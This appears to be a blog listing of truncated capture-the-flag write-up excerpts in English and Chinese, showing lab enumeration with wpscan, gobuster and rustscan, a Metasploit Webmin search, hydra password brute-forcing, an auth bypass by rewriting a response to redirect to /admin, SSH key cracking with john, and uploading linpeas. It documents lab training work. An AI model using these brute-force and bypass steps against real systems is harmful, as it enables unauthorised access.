MoonlitSyntax

wpscan --url http://blog.thm --enumerate ap,at,dbe,cb,u --detection-mode aggressive - ap = All Plugins //ap = 所有插件- at = All Themes //at = 所有主题- dbe = Database Exports //dbe = 数据库导出- cb = Config Backups //cb = 配置备份- u = Enumerate Users //u = 枚举用户- Detection-Mode = //Since we’re not worried about being detected we can use aggressive mode which occasionally delivers more results at the cost of generating more noise. 检测模式 = 由于我们不担心被检测到，因此我们可以使用主动模式，该模式偶尔会产生更多结果，但会产生更多噪音 没啥用 smbclient -L 10.1 ...

msf6 > search WebminMatching Modules================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution 1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure ...

gobuster dir --url 10.10.239.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 教用工具的,直接扫 protected需要验证 hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.89.167 http-get /protected/Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-02 21:28:12[D ...

rustscan -a 10.10.244.90 --ulimit 5000 先扫 Scanned at 2024-03-08 15:53:12 CST for 0sPORT STATE SERVICE REASON22/tcp open ssh syn-ack ttl 603000/tcp open ppp syn-ack ttl 6010250/tcp open unknown syn-ack ttl 6010255/tcp open unknown syn-ack ttl 6010257/tcp open unknown syn-ack ttl 6010259/tcp open unknown syn-ack ttl 6016443/tcp open unknown syn-ack ttl 6025000/tcp open icl-twobase1 syn-ack ttl 6031337/tcp open Elite syn-ack t ...

先扫 ftp扒一下 ──(root㉿kali)-[/home/kali]└─# ftp 10.10.219.146Connected to 10.10.219.146.220 (vsFTPd 3.0.3)Name (10.10.219.146:kali): anonymous230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls229 Entering Extended Passive Mode (|||16825|)^Creceive aborted. Waiting for remote to finish abort.ftp> passivePassive mode: off; fallback to active mode: off.ftp> ls200 EPRT command successful. Consider using EPSV.150 Here comes the directory listing.-rw-rw-r ...

感觉不如box…网速 真快啊 太快了吧,哥们 去登录页面看看,发现login.js的校验就是从后端收到某个指定的字符,来判断是否合法,这里直接用burp的拦截功能,在返回incorrect的时候把数据包改成 HTTP/1.1 302 FOUNDDate: Mon, 20 Jul 2020 14:33:13 GMTContent-Length: 21Content-Type: text/plain; charset=utf-8Connection: closelocation: /admin 重定向到admin就成功了 也可以直接设置Cookiedocument.cookie="SessionToken=pleaselogmein" 把密钥导出hash john hash --wordlist=/usr/share/wordlists/rockyou.txt 爆破得到james13是密码 ssh -i key james@10.10.186.149 把linpeas.sh传上去 scp -i key linpeas.sh james@10.10.186.149 ...